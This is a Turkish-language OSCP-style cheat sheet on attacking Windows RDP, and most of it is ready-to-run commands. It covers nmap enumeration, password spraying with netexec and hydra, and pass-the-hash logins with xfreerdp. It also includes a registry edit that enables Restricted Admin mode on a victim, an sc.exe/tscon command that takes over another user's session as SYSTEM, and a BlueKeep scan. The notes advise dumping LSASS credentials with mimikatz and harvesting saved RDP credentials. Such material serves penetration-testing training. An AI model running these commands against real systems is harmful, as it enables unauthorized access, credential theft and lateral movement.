RDP (Remote Desktop Protocol)

windows

3389 RDP enumeration (NLA/sertifika), xfreerdp ile login ve Pass-the-Hash (/pth), BlueKeep CVE-2019-0708 notu ve oturum kacirma (session hijack).

┌──

Komutlar

nmap ✓ EXAM-SAFE

nmap -p3389 -sV --script rdp-ntlm-info,rdp-enum-encryption {{RHOST}} -oN rdp_enum.txt

RDP sürüm, NLA durumu, sertifika ve NTLM bilgisi (hostname/domain) enumerate eder. HackTricks — Pentesting RDP

nmap ✓ EXAM-SAFE

nmap -p3389 --script rdp-vuln-ms12-020 {{RHOST}}

Eski RDP DoS açığı (MS12-020) kontrolü; BlueKeep için ayrica manuel teyit gerekir. HackTricks — Pentesting RDP

netexec ✓ EXAM-SAFE

netexec rdp {{RHOST}} -u {{USER}} -p {{PASS}}

RDP credential spray/validation; gecerli kimlik bilgilerini dogrular (+'Pwn3d!' admin erisimi). NetExec Wiki — RDP Protocol

netexec ✓ EXAM-SAFE

netexec rdp {{RHOST}} -u {{USER}} -H {{NTHASH}}

NTLM hash ile RDP erisim teyidi (Pass-the-Hash; Restricted Admin mode acik olmali). NetExec Wiki — RDP Protocol

xfreerdp ✓ EXAM-SAFE user

xfreerdp /v:{{RHOST}} /u:{{USER}} /p:{{PASS}} /cert:ignore +clipboard /dynamic-resolution /drive:share,/home/kali/share

Parola ile interaktif RDP oturumu; clipboard ve paylasilan surucu ile dosya transferi. WADComs — xfreerdp

xfreerdp ✓ EXAM-SAFE user

xfreerdp /v:{{RHOST}} /u:{{USER}} /pth:{{NTHASH}} /cert:ignore +clipboard /dynamic-resolution

Pass-the-Hash ile RDP (Restricted Admin mode); parola olmadan NT hash ile login. HackTricks — Pentesting RDP (Pass the Hash)

xfreerdp ✓ EXAM-SAFE user

xfreerdp /v:{{RHOST}} /d:{{DOMAIN}} /u:{{USER}} /p:{{PASS}} /cert:ignore /dynamic-resolution

Domain hesabi ile RDP; AD ortaminda DOMAIN\\USER login. WADComs — xfreerdp

reg ✓ EXAM-SAFE admin

reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Victim'de (admin shell) Restricted Admin mode'u acar; sonrasinda PtH ile RDP mumkun olur. HackTricks — Pentesting RDP (Restricted Admin)

query ✓ EXAM-SAFE admin

query user

Victim'de aktif RDP/console oturumlari listeler (session hijack icin ID tespiti). HackTricks — RDP Session Hijacking

tscon ✓ EXAM-SAFE admin

sc.exe create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0" && net start sesshijack

SYSTEM olarak baska kullanicinin RDP oturumunu parolasiz ele gecirir (session hijack). HackTricks — RDP Session Hijacking

hydra ✓ EXAM-SAFE

hydra -L {{WORDLIST}} -p {{PASS}} rdp://{{RHOST}}

RDP password spray (lockout dikkat); tek parola ile coklu user denemesi onerilir. HackTricks — Pentesting RDP (Brute Force)

msfconsole ⚠ RESTRICTED

msfconsole -q -x "use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS {{RHOST}}; run"

BlueKeep (CVE-2019-0708) zafiyet TARAMASI (sadece check; exploit OSCP'de restricted). NIST NVD — CVE-2019-0708

RDP (3389) Genel Bakis

RDP, Windows uzak masaustu servisidir. OSCP’de RDP iki sekilde kritiktir: (1) ele gecirilen kredensiyallerle lateral movement / GUI erisimi, (2) Pass-the-Hash ile parolasiz login (Restricted Admin mode). NLA (Network Level Authentication) acik ise login oncesi kimlik dogrulama gerekir.

Enumeration

nmap ile rdp-ntlm-info script’i NLA durumunu, hedef hostname/domain/OS build bilgisini sertifika uzerinden sizdirir — bu AD enumerasyonu icin altin degerdedir.
rdp-enum-encryption ile sifreleme seviyesi ve NLA zorunlulugu gorulur.
netexec rdp ile toplanan kredensiyaller hizlica dogrulanir; Pwn3d! ciktisi admin erisimini gosterir.

Kimlik Dogrulama ve Erisim

Standart login icin xfreerdp kullanin; /cert:ignore self-signed sertifikalari atlar, +clipboard ve /drive: dosya transferini kolaylastirir.
Pass-the-Hash: /pth:{{NTHASH}} ile parola olmadan login. Bunun calismasi icin hedefte Restricted Admin mode acik olmali (registry: DisableRestrictedAdmin=0). Eger admin shell’iniz varsa bu degeri kendiniz set edebilirsiniz.
Domain ortaminda /d:{{DOMAIN}} ekleyin.

BlueKeep (CVE-2019-0708)

Windows 7 / Server 2008 R2 ve oncesinde pre-auth RCE. Cok kararsiz bir exploit oldugundan ve hedefi BSOD ile cokertebildiginden OSCP sinavinda kullanilmasi onerilmez/yasaktir (sadece methodology notu). Tarama icin MSF cve_2019_0708_bluekeep aux modulu (check) kullanilabilir — examSafety: restricted.

Session Hijacking (Post-Exploitation)

SYSTEM yetkisiyle tscon kullanarak baska bir kullanicinin aktif RDP oturumu parolasiz ele gecirilir. Once query user ile session ID tespit edilir, sonra bir servis (sc create) uzerinden SYSTEM baglaminda tscon <ID> /dest:rdp-tcp#0 calistirilir. Bu, disconnected admin oturumlarini ele gecirmek icin guclu bir lateral-movement teknigidir.

Loot / Notlar

Basarili RDP sonrasi mimikatz ile bellekten kredensiyal cikartin (LSASS).
cmdkey /list ile kayitli RDP kredensiyallerini, %USERPROFILE%\\Documents\\Default.rdp dosyalarini kontrol edin.
Lockout politikasi nedeniyle RDP brute-force’ta dikkatli olun; tek parola - cok user (password spray) tercih edin.

┌──

İlgili teknikler

Mimikatz: Credential Dumping, Pass-the-Hash ve DCSync Cekirdek Modulleri Saklanan Kimlik Bilgileri — cmdkey, Unattend, GPP, Credential Manager, SAM

┌──

Kaynaklar

↗ HackTricks — Pentesting RDP ↗ NIST NVD — CVE-2019-0708 (BlueKeep)↗ WADComs — xfreerdp